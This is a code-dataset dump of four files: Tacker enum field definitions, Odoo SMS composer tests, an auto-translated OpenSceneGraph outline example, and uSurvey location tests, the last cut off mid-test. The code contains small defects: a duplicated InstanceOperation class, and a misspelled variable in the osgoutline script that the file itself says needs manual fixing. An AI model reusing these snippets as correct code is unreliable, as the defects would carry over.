repo_name (stringlengths 5–100) | path (stringlengths 4–299) | copies (stringclasses, 990 values) | size (stringlengths 4–7) | content (stringlengths 666–1.03M) | license (stringclasses, 15 values) | hash (int64, -9,223,351,895,964,839,000 to 9,223,297,778B) | line_mean (float64, 3.17–100) | line_max (int64, 7–1k) | alpha_frac (float64, 0.25–0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
openstack/tacker | tacker/objects/fields.py | 1 | 6558 | # Copyright 2018 NTT Data.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from oslo_versionedobjects import fields
# Import fields from oslo.versionedobjects
StringField = fields.StringField
ListOfObjectsField = fields.ListOfObjectsField
ListOfStringsField = fields.ListOfStringsField
DictOfStringsField = fields.DictOfStringsField
DictOfNullableStringsField = fields.DictOfNullableStringsField
DateTimeField = fields.DateTimeField
BooleanField = fields.BooleanField
BaseEnumField = fields.BaseEnumField
Enum = fields.Enum
ObjectField = fields.ObjectField
IntegerField = fields.IntegerField
FieldType = fields.FieldType
class BaseTackerEnum(Enum):
def __init__(self):
super(BaseTackerEnum, self).__init__(valid_values=self.__class__.ALL)
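# NOTE: every BaseTackerEnum subclass below is expected to define an ALL tuple;
# it is passed to oslo.versionedobjects' Enum as the set of valid values.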
class ContainerFormat(BaseTackerEnum):
AKI = 'AKI'
AMI = 'AMI'
ARI = 'ARI'
BARE = 'BARE'
DOCKER = 'DOCKER'
OVA = 'OVA'
OVF = 'OVF'
ALL = (AKI, AMI, ARI, BARE, DOCKER, OVA, OVF)
class ContainerFormatFields(BaseEnumField):
AUTO_TYPE = ContainerFormat()
class DiskFormat(BaseTackerEnum):
AKI = 'AKI'
AMI = 'AMI'
ARI = 'ARI'
ISO = 'ISO'
QCOW2 = 'QCOW2'
RAW = 'RAW'
VDI = 'VDI'
VHD = 'VHD'
VHDX = 'VHDX'
VMDK = 'VMDK'
ALL = (AKI, AMI, ARI, ISO, QCOW2, RAW, VDI, VHD, VHDX, VMDK)
class DiskFormatFields(BaseEnumField):
AUTO_TYPE = DiskFormat()
class PackageOnboardingStateType(BaseTackerEnum):
CREATED = 'CREATED'
UPLOADING = 'UPLOADING'
PROCESSING = 'PROCESSING'
ONBOARDED = 'ONBOARDED'
ALL = (CREATED, UPLOADING, PROCESSING, ONBOARDED)
class PackageOnboardingStateTypeField(BaseEnumField):
AUTO_TYPE = PackageOnboardingStateType()
class PackageOperationalStateType(BaseTackerEnum):
ENABLED = 'ENABLED'
DISABLED = 'DISABLED'
ALL = (ENABLED, DISABLED)
class PackageOperationalStateTypeField(BaseEnumField):
AUTO_TYPE = PackageOperationalStateType()
class PackageUsageStateType(BaseTackerEnum):
IN_USE = 'IN_USE'
NOT_IN_USE = 'NOT_IN_USE'
ALL = (IN_USE, NOT_IN_USE)
class PackageUsageStateTypeField(BaseEnumField):
AUTO_TYPE = PackageUsageStateType()
class DictOfNullableField(fields.AutoTypedField):
AUTO_TYPE = fields.Dict(fields.FieldType(), nullable=True)
class UUID(fields.UUID):
def coerce(self, obj, attr, value):
uuid.UUID(str(value))
return str(value)
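# The uuid.UUID(str(value)) call above exists purely for validation: it raises
# ValueError on a malformed UUID, otherwise the string form is returned.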
class UUIDField(fields.AutoTypedField):
AUTO_TYPE = UUID()
class VnfInstanceState(BaseTackerEnum):
INSTANTIATED = 'INSTANTIATED'
NOT_INSTANTIATED = 'NOT_INSTANTIATED'
ALL = (INSTANTIATED, NOT_INSTANTIATED)
class VnfInstanceStateField(BaseEnumField):
AUTO_TYPE = VnfInstanceState()
class VnfInstanceTaskState(BaseTackerEnum):
INSTANTIATING = 'INSTANTIATING'
HEALING = 'HEALING'
TERMINATING = 'TERMINATING'
SCALING = 'SCALING'
ERROR = 'ERROR'
ALL = (INSTANTIATING, HEALING, TERMINATING, SCALING, ERROR)
class VnfInstanceTaskStateField(BaseEnumField):
AUTO_TYPE = VnfInstanceTaskState()
class VnfOperationalStateType(BaseTackerEnum):
STARTED = 'STARTED'
STOPPED = 'STOPPED'
ALL = (STARTED, STOPPED)
class VnfOperationalStateTypeField(BaseEnumField):
AUTO_TYPE = VnfOperationalStateType()
class IpAddressType(BaseTackerEnum):
IPV4 = 'IPV4'
IPV6 = 'IPV6'
ALL = (IPV4, IPV6)
class IpAddressTypeField(BaseEnumField):
AUTO_TYPE = IpAddressType()
class VnfInstanceTerminationType(BaseTackerEnum):
FORCEFUL = 'FORCEFUL'
GRACEFUL = 'GRACEFUL'
ALL = (FORCEFUL, GRACEFUL)
class VnfInstanceTerminationTypeField(BaseEnumField):
AUTO_TYPE = VnfInstanceTerminationType()
class VnfcState(BaseTackerEnum):
STARTED = 'STARTED'
STOPPED = 'STOPPED'
ALL = (STARTED, STOPPED)
class InstanceOperationalState(BaseTackerEnum):
STARTING = 'STARTING'
PROCESSING = 'PROCESSING'
COMPLETED = 'COMPLETED'
FAILED_TEMP = 'FAILED_TEMP'
ROLLING_BACK = 'ROLLING_BACK'
ROLLED_BACK = 'ROLLED_BACK'
ALL = (STARTING, PROCESSING, COMPLETED, FAILED_TEMP,
ROLLING_BACK, ROLLED_BACK)
class InstanceOperationalStateField(BaseEnumField):
AUTO_TYPE = InstanceOperationalState()
class InstanceOperation(BaseTackerEnum):
INSTANTIATE = 'INSTANTIATE'
SCALE = 'SCALE'
TERMINATE = 'TERMINATE'
HEAL = 'HEAL'
MODIFY_INFO = 'MODIFY_INFO'
ALL = (INSTANTIATE, SCALE,
TERMINATE, HEAL, MODIFY_INFO)
class InstanceOperationField(BaseEnumField):
AUTO_TYPE = InstanceOperation()
class LcmOccsOperationState(BaseTackerEnum):
STARTING = 'STARTING'
PROCESSING = 'PROCESSING'
COMPLETED = 'COMPLETED'
FAILED_TEMP = 'FAILED_TEMP'
FAILED = 'FAILED'
ALL = (STARTING, PROCESSING, COMPLETED, FAILED_TEMP, FAILED)
class LcmOccsOperationType(BaseTackerEnum):
INSTANTIATE = 'INSTANTIATE'
TERMINATE = 'TERMINATE'
HEAL = 'HEAL'
SCALE = 'SCALE'
CHANGE_EXT_CONN = 'CHANGE_EXT_CONN'
ALL = (INSTANTIATE, TERMINATE, HEAL, SCALE, CHANGE_EXT_CONN)
class LcmOccsNotificationStatus(BaseTackerEnum):
START = 'START'
RESULT = 'RESULT'
ALL = (START, RESULT)
class ResourceChangeType(BaseTackerEnum):
ADDED = 'ADDED'
REMOVED = 'REMOVED'
MODIFIED = 'MODIFIED'
TEMPORARY = 'TEMPORARY'
ALL = (ADDED, REMOVED, MODIFIED, TEMPORARY)
class LcmOccsNotificationType(BaseTackerEnum):
VNF_OP_OCC_NOTIFICATION = 'VnfLcmOperationOccurrenceNotification'
VNF_ID_CREATION_NOTIFICATION = 'VnfIdentifierCreationNotification'
    ALL = (VNF_OP_OCC_NOTIFICATION,)
class VnfStatus(BaseTackerEnum):
ACTIVE = 'ACTIVE'
INACTIVE = 'INACTIVE'
ALL = (ACTIVE, INACTIVE)
class InstanceOperation(BaseTackerEnum):
    MODIFY_INFO = 'MODIFY_INFO'
    ALL = (MODIFY_INFO,)
class ErrorPoint(BaseTackerEnum):
INITIAL = 0
NOTIFY_PROCESSING = 1
VNF_CONFIG_START = 2
PRE_VIM_CONTROL = 3
POST_VIM_CONTROL = 4
INTERNAL_PROCESSING = 5
VNF_CONFIG_END = 6
NOTIFY_COMPLETED = 7
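# Illustrative sketch (not part of the original module): these typed fields are
# intended to be consumed by oslo.versionedobjects-based classes, along the
# lines of:
#
#     class VnfInstance(base.TackerObject):   # hypothetical consumer
#         fields = {
#             'id': UUIDField(nullable=False),
#             'instantiation_state': VnfInstanceStateField(nullable=False),
#             'task_state': VnfInstanceTaskStateField(nullable=True),
#         }
#
# Assigning a value outside ALL to an enum-backed field raises ValueError,
# because each *Field's AUTO_TYPE enum was constructed with valid_values=ALL.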
| apache-2.0 | -3,187,668,274,477,417,500 | 22.173145 | 78 | 0.707228 | false |
gurneyalex/odoo | addons/test_mail_full/tests/test_sms_composer.py | 5 | 20746 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo.addons.sms.tests import common as sms_common
from odoo.addons.test_mail_full.tests import common as test_mail_full_common
class TestSMSComposerComment(test_mail_full_common.BaseFunctionalTest, sms_common.MockSMS, test_mail_full_common.TestRecipients):
""" TODO LIST
* add test for default_res_model / default_res_id and stuff like that;
* add test for comment put in queue;
* add test for language support (set template lang context);
* add test for sanitized / wrong numbers;
"""
@classmethod
def setUpClass(cls):
super(TestSMSComposerComment, cls).setUpClass()
cls._test_body = 'VOID CONTENT'
cls.test_record = cls.env['mail.test.sms'].with_context(**cls._test_context).create({
'name': 'Test',
'customer_id': cls.partner_1.id,
'mobile_nbr': cls.test_numbers[0],
'phone_nbr': cls.test_numbers[1],
})
cls.test_record = cls._reset_mail_context(cls.test_record)
cls.sms_template = cls.env['sms.template'].create({
'name': 'Test Template',
'model_id': cls.env['ir.model']._get('mail.test.sms').id,
'body': 'Dear ${object.display_name} this is an SMS.',
})
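        # The ${object.display_name} placeholder in the template body is
        # rendered per record at send time; the template-based tests below
        # depend on that substitution.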
def test_composer_comment_not_mail_thread(self):
with self.sudo('employee'):
record = self.env['test_performance.base'].create({'name': 'TestBase'})
composer = self.env['sms.composer'].with_context(
active_model='test_performance.base', active_id=record.id
).create({
'body': self._test_body,
'numbers': ','.join(self.random_numbers),
})
with self.mockSMSGateway():
composer._action_send_sms()
self.assertSMSSent(self.random_numbers_san, self._test_body)
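        # The same arrangement recurs throughout this file: mockSMSGateway()
        # intercepts outgoing SMS instead of hitting a real gateway, and the
        # assertSMS* helpers then verify what was queued, sent or notified.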
def test_composer_comment_default(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_numbers_san[1]}], self._test_body, messages)
def test_composer_comment_field_1(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
).create({
'body': self._test_body,
'number_field_name': 'mobile_nbr',
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_numbers_san[0]}], self._test_body, messages)
def test_composer_comment_field_2(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
).create({
'body': self._test_body,
'number_field_name': 'phone_nbr',
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_numbers_san[1]}], self._test_body, messages)
def test_composer_comment_field_w_numbers(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
default_number_field_name='mobile_nbr',
).create({
'body': self._test_body,
'numbers': ','.join(self.random_numbers),
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([
{'partner': self.test_record.customer_id, 'number': self.test_record.mobile_nbr},
{'number': self.random_numbers_san[0]}, {'number': self.random_numbers_san[1]}], self._test_body, messages)
def test_composer_comment_field_w_template(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
active_model='mail.test.sms', active_id=self.test_record.id,
default_template_id=self.sms_template.id,
default_number_field_name='mobile_nbr',
).create({})
with self.mockSMSGateway():
messages = composer._action_send_sms()
self.assertSMSNotification([{'partner': self.test_record.customer_id, 'number': self.test_record.mobile_nbr}], 'Dear %s this is an SMS.' % self.test_record.display_name, messages)
def test_composer_numbers_no_model(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='numbers'
).create({
'body': self._test_body,
'numbers': ','.join(self.random_numbers),
})
with self.mockSMSGateway():
composer._action_send_sms()
self.assertSMSSent(self.random_numbers_san, self._test_body)
class TestSMSComposerBatch(test_mail_full_common.BaseFunctionalTest, sms_common.MockSMS):
@classmethod
def setUpClass(cls):
super(TestSMSComposerBatch, cls).setUpClass()
cls._test_body = 'Zizisse an SMS.'
cls._create_records_for_batch('mail.test.sms', 3)
cls.sms_template = cls._create_sms_template('mail.test.sms')
def test_composer_batch_active_domain(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
default_use_active_domain=True,
active_domain=[('id', 'in', self.records.ids)],
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
def test_composer_batch_active_ids(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
active_ids=self.records.ids
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
def test_composer_batch_domain(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
default_use_active_domain=True,
default_active_domain=repr([('id', 'in', self.records.ids)]),
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
def test_composer_batch_res_ids(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='comment',
default_res_model='mail.test.sms',
default_res_ids=repr(self.records.ids),
).create({
'body': self._test_body,
})
with self.mockSMSGateway():
messages = composer._action_send_sms()
for record in self.records:
self.assertSMSNotification([{'partner': r.customer_id} for r in self.records], 'Zizisse an SMS.', messages)
class TestSMSComposerMass(test_mail_full_common.BaseFunctionalTest, sms_common.MockSMS):
@classmethod
def setUpClass(cls):
super(TestSMSComposerMass, cls).setUpClass()
cls._test_body = 'Zizisse an SMS.'
cls._create_records_for_batch('mail.test.sms', 3)
cls.sms_template = cls._create_sms_template('mail.test.sms')
def test_composer_mass_active_domain(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
default_use_active_domain=True,
active_domain=[('id', 'in', self.records.ids)],
).create({
'body': self._test_body,
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, self._test_body)
def test_composer_mass_active_domain_w_template(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
default_use_active_domain=True,
active_domain=[('id', 'in', self.records.ids)],
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_mass_active_ids(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners:
self.assertSMSOutgoing(partner, None, self._test_body)
def test_composer_mass_active_ids_w_blacklist(self):
self.env['phone.blacklist'].create([{
'number': p.phone_sanitized,
'active': True,
} for p in self.partners[:5]])
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
'mass_use_blacklist': True,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners[5:]:
self.assertSMSOutgoing(partner, partner.phone_sanitized, content=self._test_body)
for partner in self.partners[:5]:
self.assertSMSCanceled(partner, partner.phone_sanitized, 'sms_blacklist', content=self._test_body)
def test_composer_mass_active_ids_wo_blacklist(self):
self.env['phone.blacklist'].create([{
'number': p.phone_sanitized,
'active': True,
} for p in self.partners[:5]])
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
'mass_use_blacklist': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners:
self.assertSMSOutgoing(partner, partner.phone_sanitized, content=self._test_body)
def test_composer_mass_active_ids_w_blacklist_and_done(self):
self.env['phone.blacklist'].create([{
'number': p.phone_sanitized,
'active': True,
} for p in self.partners[:5]])
for p in self.partners[8:]:
p.mobile = self.partners[8].mobile
self.assertEqual(p.phone_sanitized, self.partners[8].phone_sanitized)
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
).create({
'body': self._test_body,
'mass_keep_log': False,
'mass_use_blacklist': True,
})
with self.mockSMSGateway():
composer.action_send_sms()
for partner in self.partners[8:]:
self.assertSMSOutgoing(partner, partner.phone_sanitized, content=self._test_body)
for partner in self.partners[5:8]:
self.assertSMSCanceled(partner, partner.phone_sanitized, 'sms_duplicate', content=self._test_body)
for partner in self.partners[:5]:
self.assertSMSCanceled(partner, partner.phone_sanitized, 'sms_blacklist', content=self._test_body)
def test_composer_mass_active_ids_w_template(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_mass_active_ids_w_template_and_lang(self):
self.env.ref('base.lang_fr').write({'active': True})
self.env['ir.translation'].create({
'type': 'model',
'name': 'sms.template,body',
'lang': 'fr_FR',
'res_id': self.sms_template.id,
'src': self.sms_template.body,
'value': 'Cher·e· ${object.display_name} ceci est un SMS.',
})
# set template to try to use customer lang
self.sms_template.write({
'lang': '${object.customer_id.lang}',
})
# set one customer as french speaking
self.partners[2].write({'lang': 'fr_FR'})
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
if record.customer_id == self.partners[2]:
self.assertSMSOutgoing(record.customer_id, None, 'Cher·e· %s ceci est un SMS.' % record.display_name)
else:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_mass_active_ids_w_template_and_log(self):
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='mass',
default_res_model='mail.test.sms',
active_ids=self.records.ids,
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': True,
})
with self.mockSMSGateway():
composer.action_send_sms()
for record in self.records:
self.assertSMSOutgoing(record.customer_id, None, 'Dear %s this is an SMS.' % record.display_name)
self.assertSMSLogged(record, 'Dear %s this is an SMS.' % record.display_name)
def test_composer_template_context_action(self):
""" Test the context action from a SMS template (Add context action button)
and the usage with the sms composer """
# Create the lang info
self.env.ref('base.lang_fr').write({'active': True})
self.env['ir.translation'].create({
'type': 'model',
'name': 'sms.template,body',
'lang': 'fr_FR',
'res_id': self.sms_template.id,
'src': self.sms_template.body,
'value': "Hello ${object.display_name} ceci est en français.",
})
# set template to try to use customer lang
self.sms_template.write({
'lang': '${object.customer_id.lang}',
})
# create a second record linked to a customer in another language
self.partners[2].write({'lang': 'fr_FR'})
test_record_2 = self.env['mail.test.sms'].create({
'name': 'Test',
'customer_id': self.partners[2].id,
})
test_record_1 = self.env['mail.test.sms'].create({
'name': 'Test',
'customer_id': self.partners[1].id,
})
# Composer creation with context from a template context action (simulate) - comment (single recipient)
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='guess',
default_res_ids=[test_record_2.id],
default_res_id=test_record_2.id,
active_ids=[test_record_2.id],
active_id=test_record_2.id,
active_model='mail.test.sms',
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': False,
})
# Call manually the onchange
composer._onchange_template_id()
self.assertEquals(composer.composition_mode, "comment")
self.assertEquals(composer.body, "Hello %s ceci est en français." % test_record_2.display_name)
with self.mockSMSGateway():
messages = composer._action_send_sms()
number = self.partners[2].phone_get_sanitized_number()
self.assertSMSNotification([{'partner': test_record_2.customer_id, 'number': number}], "Hello %s ceci est en français." % test_record_2.display_name, messages)
# Composer creation with context from a template context action (simulate) - mass (multiple recipient)
with self.sudo('employee'):
composer = self.env['sms.composer'].with_context(
default_composition_mode='guess',
default_res_ids=[test_record_1.id, test_record_2.id],
default_res_id=test_record_1.id,
active_ids=[test_record_1.id, test_record_2.id],
active_id=test_record_1.id,
active_model='mail.test.sms',
default_template_id=self.sms_template.id,
).create({
'mass_keep_log': True,
})
# Call manually the onchange
composer._onchange_template_id()
self.assertEquals(composer.composition_mode, "mass")
            # The body stays in English (the template default); the per-record
            # language is only applied when the SMS are actually sent.
self.assertEquals(composer.body, "Dear ${object.display_name} this is an SMS.")
with self.mockSMSGateway():
composer.action_send_sms()
self.assertSMSOutgoing(test_record_1.customer_id, None, 'Dear %s this is an SMS.' % test_record_1.display_name)
self.assertSMSOutgoing(test_record_2.customer_id, None, "Hello %s ceci est en français." % test_record_2.display_name)
| agpl-3.0 | -7,740,930,999,319,327,000 | 40.64257 | 187 | 0.566978 | false |
JaneliaSciComp/osgpyplusplus | examples/debugging2/osgoutline.py | 1 | 2980 | #!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgoutline"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osg
from osgpypp import osgDB
from osgpypp import osgFX
from osgpypp import osgViewer
# Translated from file 'osgoutline.cpp'
# -*-c++-*-
#
# * Draw an outline around a model.
#
#include <osg/Group>
#include <osg/PositionAttitudeTransform>
#include <osgDB/ReadFile>
#include <osgViewer/Viewer>
#include <osgFX/Outline>
def main(argv):
arguments = osg.ArgumentParser(argv)
arguments.getApplicationUsage().setCommandLineUsage(arguments.getApplicationName()+" [options] <file>")
arguments.getApplicationUsage().addCommandLineOption("--testOcclusion","Test occlusion by other objects")
arguments.getApplicationUsage().addCommandLineOption("-h or --help","Display this information")
testOcclusion = False
while arguments.read("--testOcclusion") : testOcclusion = True
# load outlined object
modelFilename = "dumptrick.osgt"
if arguments.argc() > 2:
modelFileName = arguments[2]
outlineModel = osgDB.readNodeFile(modelFilename)
    if not outlineModel:
        print("Unable to load model '%s'" % modelFilename)
        return -1
# create scene
root = osg.Group()
# create outline effect
outline = osgFX.Outline()
root.addChild(outline)
outline.setWidth(8)
outline.setColor(osg.Vec4(1,1,0,1))
outline.addChild(outlineModel)
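    # osgFX.Outline draws the halo with a stencil-buffer technique, which is
    # why a stencil buffer is requested and cleared near the end of main().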
if testOcclusion :
# load occluder
occludedModelFilename = "cow.osgt"
occludedModel = osgDB.readNodeFile(occludedModelFilename)
        if not occludedModel:
            print("Unable to load model '%s'" % occludedModelFilename)
            return -1
# occluder offset
bsphere = outlineModel.getBound()
occluderOffset = osg.Vec3(0,1,0) * bsphere.radius() * 1.2
# occluder behind outlined model
modelTransform0 = osg.PositionAttitudeTransform()
modelTransform0.setPosition(bsphere.center() + occluderOffset)
modelTransform0.addChild(occludedModel)
root.addChild(modelTransform0)
# occluder in front of outlined model
modelTransform1 = osg.PositionAttitudeTransform()
modelTransform1.setPosition(bsphere.center() - occluderOffset)
modelTransform1.addChild(occludedModel)
root.addChild(modelTransform1)
# must have stencil buffer...
osg.DisplaySettings.instance().setMinimumNumStencilBits(1)
# construct the viewer
viewer = osgViewer.Viewer()
viewer.setSceneData(root)
# must clear stencil buffer...
    clearMask = viewer.getCamera().getClearMask()
    # 0x00000400 is the standard OpenGL GL_STENCIL_BUFFER_BIT; defined here in
    # case osgpypp does not re-export the GL_* constants.
    GL_STENCIL_BUFFER_BIT = 0x00000400
    viewer.getCamera().setClearMask(clearMask | GL_STENCIL_BUFFER_BIT)
viewer.getCamera().setClearStencil(0)
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
| bsd-3-clause | -6,478,428,171,334,861,000 | 27.653846 | 109 | 0.69094 | false |
unicefuganda/uSurvey | survey/tests/utils/test_views_helper.py | 1 | 7986 | from django.test import TestCase
from survey.models.locations import *
from survey.utils.views_helper import contains_key, get_descendants, get_ancestors, clean_query_params, prepend_to_keys
class ViewsHelperTest(TestCase):
def test_contains_key(self):
self.assertTrue(contains_key({'bla': '1'}, 'bla'))
self.assertFalse(contains_key({'haha': '1'}, 'bla'))
self.assertFalse(contains_key({'bla': '-1'}, 'bla'))
self.assertFalse(contains_key({'bla': ''}, 'bla'))
self.assertFalse(contains_key({'bla': 'NOT_A_DIGIT'}, 'bla'))
def test_get_descendants(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(
name='Region', slug='region', parent=country)
city = LocationType.objects.create(
name='City', slug='city', parent=region)
parish = LocationType.objects.create(
name='Parish', slug='parish', parent=city)
village = LocationType.objects.create(
name='Village', slug='village', parent=parish)
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty', parent=village)
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
        expected_location_descendants = [abim, abim_son, abim_son_son]
        descendants = get_descendants(abim)
        self.assertItemsEqual(expected_location_descendants, descendants)
        self.assertIn(abim, descendants)
def test_get_descendants_when_include_self_is_false(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(name='Region', slug='region')
city = LocationType.objects.create(name='City', slug='city')
parish = LocationType.objects.create(name='Parish', slug='parish')
village = LocationType.objects.create(name='Village', slug='village')
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty')
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
abim_son_daughter = Location.objects.create(
name='OYARO', parent=abim_son, type=village)
abim_son_daughter_daughter = Location.objects.create(
name='WIAWER', parent=abim_son_daughter, type=subcounty)
abim_son_son_daughter = Location.objects.create(
name='ATUNGA', parent=abim_son_son, type=subcounty)
abim_son_son_son = Location.objects.create(
name='WICERE', parent=abim_son_son, type=subcounty)
expected_location_descendants = [abim_son, abim_son_son, abim_son_daughter, abim_son_son_daughter,
abim_son_son_son, abim_son_daughter_daughter]
        descendants = get_descendants(abim, include_self=False)
        self.assertItemsEqual(expected_location_descendants, descendants)
        self.assertNotIn(abim, descendants)
def test_get_ancestor(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(name='Region', slug='region')
city = LocationType.objects.create(name='City', slug='city')
parish = LocationType.objects.create(name='Parish', slug='parish')
village = LocationType.objects.create(name='Village', slug='village')
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty')
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
abim_son_daughter = Location.objects.create(
name='OYARO', parent=abim_son, type=village)
abim_son_daughter_daughter = Location.objects.create(
name='WIAWER', parent=abim_son_daughter, type=subcounty)
abim_son_son_daughter = Location.objects.create(
name='ATUNGA', parent=abim_son_son, type=subcounty)
abim_son_son_son = Location.objects.create(
name='WICERE', parent=abim_son_son, type=subcounty)
self.assertEqual([], get_ancestors(africa))
self.assertEqual([africa], get_ancestors(uganda))
self.assertEqual([uganda, africa], get_ancestors(abim))
self.assertEqual([abim, uganda, africa], get_ancestors(abim_son))
self.assertEqual([abim_son, abim, uganda, africa],
get_ancestors(abim_son_son))
self.assertEqual([abim_son_son, abim_son, abim, uganda,
africa], get_ancestors(abim_son_son_son))
def test_get_ancestor_including_self(self):
country = LocationType.objects.create(name='Country', slug='country')
region = LocationType.objects.create(name='Region', slug='region')
city = LocationType.objects.create(name='City', slug='city')
parish = LocationType.objects.create(name='Parish', slug='parish')
village = LocationType.objects.create(name='Village', slug='village')
subcounty = LocationType.objects.create(
name='Subcounty', slug='subcounty')
africa = Location.objects.create(name='Africa', type=country)
uganda = Location.objects.create(
name='Uganda', type=region, parent=africa)
abim = Location.objects.create(name='ABIM', parent=uganda, type=city)
abim_son = Location.objects.create(
name='LABWOR', parent=abim, type=parish)
abim_son_son = Location.objects.create(
name='KALAKALA', parent=abim_son, type=village)
abim_son_daughter = Location.objects.create(
name='OYARO', parent=abim_son, type=village)
abim_son_daughter_daughter = Location.objects.create(
name='WIAWER', parent=abim_son_daughter, type=subcounty)
abim_son_son_daughter = Location.objects.create(
name='ATUNGA', parent=abim_son_son, type=subcounty)
